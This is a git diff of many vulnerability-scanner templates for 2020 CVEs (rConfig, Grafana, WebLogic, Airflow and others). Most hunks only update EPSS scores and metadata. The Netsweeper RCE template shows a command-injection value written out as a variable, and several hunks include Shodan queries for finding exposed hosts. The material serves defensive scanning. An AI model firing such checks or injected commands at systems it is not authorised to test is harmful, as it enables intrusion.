diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml
index 68e7f6a324..bef309e470 100644
--- a/http/cves/2020/CVE-2020-10548.yaml
+++ b/http/cves/2020/CVE-2020-10548.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-10548
cwe-id: CWE-89
- epss-score: 0.39106
+ epss-score: 0.4901
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97048
metadata:
max-request: 1
vendor: rconfig
diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml
index 5beb3d525c..3686f0bf63 100644
--- a/http/cves/2020/CVE-2020-10549.yaml
+++ b/http/cves/2020/CVE-2020-10549.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-10549
cwe-id: CWE-89
- epss-score: 0.39106
+ epss-score: 0.4901
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97048
metadata:
max-request: 1
vendor: rconfig
diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml
index cb8a7d2531..d110ac274e 100644
--- a/http/cves/2020/CVE-2020-10770.yaml
+++ b/http/cves/2020/CVE-2020-10770.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-10770
cwe-id: CWE-918
- epss-score: 0.37188
+ epss-score: 0.37441
cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9668
metadata:
max-request: 1
vendor: redhat
diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml
index b7cdf44bfc..fbb770a11d 100644
--- a/http/cves/2020/CVE-2020-10973.yaml
+++ b/http/cves/2020/CVE-2020-10973.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-10973
cwe-id: CWE-306
- epss-score: 0.02315
+ epss-score: 0.03878
cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
+ epss-percentile: 0.90774
metadata:
max-request: 1
shodan-query: http.html:"Wavlink"
diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml
index de6207bc32..6b8d757e1a 100644
--- a/http/cves/2020/CVE-2020-11034.yaml
+++ b/http/cves/2020/CVE-2020-11034.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-601,CWE-185
epss-score: 0.00396
cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.7014
metadata:
max-request: 2
vendor: glpi-project
diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml
index 300821eebc..594609b3a9 100644
--- a/http/cves/2020/CVE-2020-11110.yaml
+++ b/http/cves/2020/CVE-2020-11110.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00131
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.47313
metadata:
max-request: 1
shodan-query: title:"Grafana"
diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml
index c462175b8b..67f91bb09e 100644
--- a/http/cves/2020/CVE-2020-11450.yaml
+++ b/http/cves/2020/CVE-2020-11450.yaml
@@ -17,8 +17,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-11450
- epss-score: 0.31408
+ epss-score: 0.34975
cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96566
metadata:
max-request: 1
vendor: microstrategy
diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml
index d75cc710df..5e8dcf5627 100644
--- a/http/cves/2020/CVE-2020-11455.yaml
+++ b/http/cves/2020/CVE-2020-11455.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-11455
cwe-id: CWE-22
- epss-score: 0.3601
+ epss-score: 0.5225
cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97134
metadata:
max-request: 1
vendor: limesurvey
diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml
index 0dc42b848c..44a2ac4ad0 100644
--- a/http/cves/2020/CVE-2020-11529.yaml
+++ b/http/cves/2020/CVE-2020-11529.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00349
cpe: cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*
+ epss-percentile: 0.68242
metadata:
max-request: 1
vendor: getgrav
diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml
index ace035163d..4a66c1e8c0 100644
--- a/http/cves/2020/CVE-2020-11530.yaml
+++ b/http/cves/2020/CVE-2020-11530.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-11530
cwe-id: CWE-89
- epss-score: 0.70149
+ epss-score: 0.65013
cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9744
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml
index 788c8da648..e2fce74085 100644
--- a/http/cves/2020/CVE-2020-11546.yaml
+++ b/http/cves/2020/CVE-2020-11546.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-94
epss-score: 0.96429
cpe: cpe:2.3:a:superwebmailer:superwebmailer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99376
metadata:
max-request: 1
shodan-query: title:"SuperWebMailer"
diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml
index 820d22a8f7..09ca16e599 100644
--- a/http/cves/2020/CVE-2020-11547.yaml
+++ b/http/cves/2020/CVE-2020-11547.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-306
epss-score: 0.0011
cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
+ epss-percentile: 0.43305
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml
index 7a3c4c889a..de63450f9e 100644
--- a/http/cves/2020/CVE-2020-11710.yaml
+++ b/http/cves/2020/CVE-2020-11710.yaml
@@ -17,6 +17,7 @@ info:
cve-id: CVE-2020-11710
epss-score: 0.02084
cpe: cpe:2.3:a:konghq:docker-kong:*:*:*:*:*:kong:*:*
+ epss-percentile: 0.87657
metadata:
max-request: 1
framework: kong
diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml
index c422ff2777..9f810f48bb 100644
--- a/http/cves/2020/CVE-2020-11738.yaml
+++ b/http/cves/2020/CVE-2020-11738.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-11738
cwe-id: CWE-22
- epss-score: 0.97302
+ epss-score: 0.97273
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
+ epss-percentile: 0.99776
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml
index b77011938e..6fba21de14 100644
--- a/http/cves/2020/CVE-2020-11798.yaml
+++ b/http/cves/2020/CVE-2020-11798.yaml
@@ -9,15 +9,24 @@ info:
reference:
- https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-11798
+ - http://packetstormsecurity.com/files/171751/Mitel-MiCollab-AWV-8.1.2.4-9.1.3-Directory-Traversal-LFI.html
+ - https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin-20-0005-01.pdf
+ - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
+ cve-id: CVE-2020-11798
cwe-id: CWE-22
+ epss-score: 0.75314
+ cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97741
metadata:
max-request: 1
verified: true
shodan-query: html:"Mitel" html:"MiCollab"
- tags: cve,cve2020,mitel,micollab,lfi
+ vendor: mitel
+ product: micollab_audio\,_web_\&_video_conferencing
+ tags: packetstorm,cve,cve2020,mitel,micollab,lfi
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml
index cb5a636b62..3088685ab1 100644
--- a/http/cves/2020/CVE-2020-11853.yaml
+++ b/http/cves/2020/CVE-2020-11853.yaml
@@ -18,6 +18,7 @@ info:
cve-id: CVE-2020-11853
epss-score: 0.94797
cpe: cpe:2.3:a:microfocus:operation_bridge_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98954
metadata:
max-request: 1
vendor: microfocus
diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml
index 28d7985554..f5b8cfeb8b 100644
--- a/http/cves/2020/CVE-2020-11854.yaml
+++ b/http/cves/2020/CVE-2020-11854.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-798
epss-score: 0.97414
cpe: cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:*
+ epss-percentile: 0.99886
metadata:
max-request: 1
vendor: microfocus
diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml
index 0c02c4a382..8eeccfa7a9 100644
--- a/http/cves/2020/CVE-2020-11930.yaml
+++ b/http/cves/2020/CVE-2020-11930.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00396
cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.70156
metadata:
max-request: 1
publicwww-query: "/wp-content/plugins/gtranslate"
@@ -48,4 +49,4 @@ http:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml
index 289518abca..98856ddf36 100644
--- a/http/cves/2020/CVE-2020-11978.yaml
+++ b/http/cves/2020/CVE-2020-11978.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97524
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9998
metadata:
max-request: 4
shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml
index 6c31e60a3c..2ac8c59119 100644
--- a/http/cves/2020/CVE-2020-11991.yaml
+++ b/http/cves/2020/CVE-2020-11991.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-11991
cwe-id: CWE-611
- epss-score: 0.84866
+ epss-score: 0.80318
cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97888
metadata:
max-request: 1
shodan-query: http.html:"Apache Cocoon"
diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml
index ab5e3450bb..21026718ef 100644
--- a/http/cves/2020/CVE-2020-12054.yaml
+++ b/http/cves/2020/CVE-2020-12054.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00129
cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.46935
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml
index 31381df569..eef15e7b6a 100644
--- a/http/cves/2020/CVE-2020-12116.yaml
+++ b/http/cves/2020/CVE-2020-12116.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-12116
cwe-id: CWE-22
- epss-score: 0.97344
+ epss-score: 0.97355
cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99837
metadata:
max-request: 2
vendor: zohocorp
diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml
index 1cb30db2de..594c94f4ad 100644
--- a/http/cves/2020/CVE-2020-12127.yaml
+++ b/http/cves/2020/CVE-2020-12127.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-306
epss-score: 0.03579
cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*
+ epss-percentile: 0.90419
metadata:
max-request: 1
shodan-query: http.html:"Wavlink"
diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml
index 040710c4f2..5c8c5ffde9 100644
--- a/http/cves/2020/CVE-2020-12447.yaml
+++ b/http/cves/2020/CVE-2020-12447.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-12447
cwe-id: CWE-22
- epss-score: 0.01261
+ epss-score: 0.01778
cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:*
+ epss-percentile: 0.86487
metadata:
max-request: 1
vendor: onkyo
diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml
index ffe9abc9d7..d12ebfb8ff 100644
--- a/http/cves/2020/CVE-2020-12478.yaml
+++ b/http/cves/2020/CVE-2020-12478.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-12478
cwe-id: CWE-306
- epss-score: 0.00761
+ epss-score: 0.00901
cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:*
+ epss-percentile: 0.80707
metadata:
max-request: 1
shodan-query: http.html:"teampass"
diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml
index 456e90fcb7..d310dee4d4 100644
--- a/http/cves/2020/CVE-2020-12720.yaml
+++ b/http/cves/2020/CVE-2020-12720.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-12720
cwe-id: CWE-306
- epss-score: 0.83523
+ epss-score: 0.88108
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98245
metadata:
max-request: 1
vendor: vbulletin
diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml
index 6643002c52..bee84683e1 100644
--- a/http/cves/2020/CVE-2020-12800.yaml
+++ b/http/cves/2020/CVE-2020-12800.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-12800
cwe-id: CWE-434
- epss-score: 0.97425
+ epss-score: 0.97435
cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99908
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml
index 250edae1a3..cbd62ae274 100644
--- a/http/cves/2020/CVE-2020-13117.yaml
+++ b/http/cves/2020/CVE-2020-13117.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-77
epss-score: 0.0785
cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.93385
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml
index 261b04a3b9..444d6195b6 100644
--- a/http/cves/2020/CVE-2020-13121.yaml
+++ b/http/cves/2020/CVE-2020-13121.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00235
cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:*
+ epss-percentile: 0.60968
metadata:
max-request: 1
vendor: rcos
diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml
index c34de78a73..24262b1a45 100644
--- a/http/cves/2020/CVE-2020-13158.yaml
+++ b/http/cves/2020/CVE-2020-13158.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-13158
cwe-id: CWE-22
- epss-score: 0.96888
+ epss-score: 0.96791
cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:*
+ epss-percentile: 0.99534
metadata:
max-request: 1
vendor: articatech
diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml
index 5f7f3e16fa..06abde52d8 100644
--- a/http/cves/2020/CVE-2020-13167.yaml
+++ b/http/cves/2020/CVE-2020-13167.yaml
@@ -17,12 +17,12 @@ info:
cwe-id: CWE-78
epss-score: 0.97384
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99866
metadata:
max-request: 2
vendor: netsweeper
product: netsweeper
tags: cve,cve2020,netsweeper,rce,python,webadmin
-
variables:
rand_str: "{{randstr}}"
cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out'
diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml
index 45e88efa3c..6b9ed09cb1 100644
--- a/http/cves/2020/CVE-2020-13258.yaml
+++ b/http/cves/2020/CVE-2020-13258.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00464
cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72315
metadata:
max-request: 1
vendor: contentful
diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml
index ffe2cb9506..dec5fa1886 100644
--- a/http/cves/2020/CVE-2020-13379.yaml
+++ b/http/cves/2020/CVE-2020-13379.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 8.2
cve-id: CVE-2020-13379
cwe-id: CWE-918
- epss-score: 0.16322
+ epss-score: 0.21406
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95791
metadata:
max-request: 1
shodan-query: title:"Grafana"
diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml
index 32f0657567..6bc2cd114b 100644
--- a/http/cves/2020/CVE-2020-13405.yaml
+++ b/http/cves/2020/CVE-2020-13405.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-306
epss-score: 0.00667
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.77128
metadata:
max-request: 3
shodan-query: http.html:"microweber"
diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml
index 54ba3e4f7b..50690fa1dc 100644
--- a/http/cves/2020/CVE-2020-13483.yaml
+++ b/http/cves/2020/CVE-2020-13483.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00113
cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
+ epss-percentile: 0.44064
metadata:
max-request: 2
vendor: bitrix24
diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml
index d02cf5687c..2ec9691af0 100644
--- a/http/cves/2020/CVE-2020-13700.yaml
+++ b/http/cves/2020/CVE-2020-13700.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-13700
cwe-id: CWE-639
- epss-score: 0.01364
+ epss-score: 0.01923
cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87118
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml
index 081d0f3d3b..32ff5451ff 100644
--- a/http/cves/2020/CVE-2020-13820.yaml
+++ b/http/cves/2020/CVE-2020-13820.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00237
cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:*
+ epss-percentile: 0.6108
metadata:
max-request: 1
shodan-query: title:"Extreme Management Center"
diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml
index 136990219f..4ad258414a 100644
--- a/http/cves/2020/CVE-2020-13927.yaml
+++ b/http/cves/2020/CVE-2020-13927.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-13927
cwe-id: CWE-1188
- epss-score: 0.94321
+ epss-score: 0.95404
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99097
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml
index 6eeb92c490..7b3c1bf379 100644
--- a/http/cves/2020/CVE-2020-13937.yaml
+++ b/http/cves/2020/CVE-2020-13937.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-922
epss-score: 0.97402
cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99877
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml
index 052505f23a..3761cc2185 100644
--- a/http/cves/2020/CVE-2020-13942.yaml
+++ b/http/cves/2020/CVE-2020-13942.yaml
@@ -23,12 +23,12 @@ info:
cwe-id: CWE-74,CWE-20
epss-score: 0.97533
cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99986
metadata:
max-request: 1
vendor: apache
product: unomi
tags: cve,cve2020,apache,rce
-
variables:
id: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml
index c9eb69b7e8..9cbbacbb20 100644
--- a/http/cves/2020/CVE-2020-13945.yaml
+++ b/http/cves/2020/CVE-2020-13945.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2020-13945
cwe-id: CWE-522
- epss-score: 0.00598
+ epss-score: 0.00522
cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73906
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml
index f4bdee3db1..2ca346afea 100644
--- a/http/cves/2020/CVE-2020-14092.yaml
+++ b/http/cves/2020/CVE-2020-14092.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.76739
cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.97784
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml
index 5c73904b6c..ff855d73a3 100644
--- a/http/cves/2020/CVE-2020-14144.yaml
+++ b/http/cves/2020/CVE-2020-14144.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2020-14144
cwe-id: CWE-78
- epss-score: 0.96792
+ epss-score: 0.96765
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99519
metadata:
max-request: 7
shodan-query: html:"Powered by Gitea Version"
diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml
index defae285c5..ea377200f2 100644
--- a/http/cves/2020/CVE-2020-14179.yaml
+++ b/http/cves/2020/CVE-2020-14179.yaml
@@ -14,6 +14,7 @@ info:
cve-id: CVE-2020-14179
epss-score: 0.0047
cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72498
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml
index 84082ee55e..994e9f016d 100644
--- a/http/cves/2020/CVE-2020-14181.yaml
+++ b/http/cves/2020/CVE-2020-14181.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-14181
cwe-id: CWE-200
- epss-score: 0.971
+ epss-score: 0.96932
cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99604
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml
index 0da876ebbf..a040285363 100644
--- a/http/cves/2020/CVE-2020-14408.yaml
+++ b/http/cves/2020/CVE-2020-14408.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00113
cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*
+ epss-percentile: 0.44064
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml
index fe2b26bf64..4a0571c133 100644
--- a/http/cves/2020/CVE-2020-14413.yaml
+++ b/http/cves/2020/CVE-2020-14413.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00095
cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:*
+ epss-percentile: 0.39345
metadata:
max-request: 1
vendor: nedi
diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml
index 4fe69b2713..067de8e53c 100644
--- a/http/cves/2020/CVE-2020-14750.yaml
+++ b/http/cves/2020/CVE-2020-14750.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-14750
- epss-score: 0.97528
+ epss-score: 0.97553
cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99993
metadata:
max-request: 1
shodan-query: http.html:"Weblogic Application Server"
diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml
index 935d3ff093..3b14004ff6 100644
--- a/http/cves/2020/CVE-2020-14864.yaml
+++ b/http/cves/2020/CVE-2020-14864.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-14864
cwe-id: CWE-22
- epss-score: 0.30306
+ epss-score: 0.32452
cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*
+ epss-percentile: 0.96445
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml
index 984102de19..7f2865a76a 100644
--- a/http/cves/2020/CVE-2020-14882.yaml
+++ b/http/cves/2020/CVE-2020-14882.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-14882
- epss-score: 0.97544
+ epss-score: 0.97537
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99988
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml
index 5b7c8156b8..8dddb0254a 100644
--- a/http/cves/2020/CVE-2020-14883.yaml
+++ b/http/cves/2020/CVE-2020-14883.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-14883
- epss-score: 0.97528
+ epss-score: 0.97537
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99989
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml
index b43b8e7c11..7b7278d9de 100644
--- a/http/cves/2020/CVE-2020-15050.yaml
+++ b/http/cves/2020/CVE-2020-15050.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-15050
cwe-id: CWE-22
- epss-score: 0.14193
+ epss-score: 0.13878
cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94934
metadata:
max-request: 1
vendor: supremainc
diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml
index 4a2318f583..5ad478bc16 100644
--- a/http/cves/2020/CVE-2020-15129.yaml
+++ b/http/cves/2020/CVE-2020-15129.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00519
